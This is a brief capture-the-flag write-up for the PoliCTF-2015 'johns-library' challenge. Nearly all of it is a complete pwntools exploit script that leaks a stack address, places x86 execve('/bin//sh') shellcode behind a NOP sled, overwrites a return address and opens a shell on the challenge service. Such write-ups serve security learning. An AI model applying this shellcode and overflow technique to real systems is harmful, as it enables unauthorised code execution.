cdor1's lab
PoliCTF-2015 johns-library
Write-up: I used an esp leak to learn the stack address, then placed shellcode there to get a shell.
```python
from pwn import *

s = remote('localhost', 4000)

def read(index):
    # menu option 'r': read the entry at the given index
    print s.recvuntil('u - exit')
    s.sendline('r')
    print s.recvuntil('read: ')
    s.sendline(str(index))

def add(title, data):
    # menu option 'a': add an entry with a title and a body
    print s.recvuntil('u - exit')
    s.sendline('a')
    print s.recvuntil('title:')
    s.sendline(str(title))
    s.sendline(data)

# 28-byte x86 execve("/bin//sh") shellcode followed by exit
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'

# Step 1: leak a stack address. Add at index -28, then read index 1 and
# take the first 4 bytes of the reply as a pointer (the esp leak).
add(-28, 'A')
read(1)
ret = u32(s.recv(4))
log.info('ret : ' + hex(ret))

# Step 2: NOP sled + shellcode + padding, then the leaked stack address,
# so that control lands somewhere in the sled and slides into the shellcode.
payload = '\x90'*300
payload += shellcode
payload += '\x90'*740
payload += p32(ret)
add(1, payload)

# Step 3: choose 'u' (exit) to trigger the jump into the payload
print s.recvuntil('u - exit')
s.sendline('u')
s.interactive()
```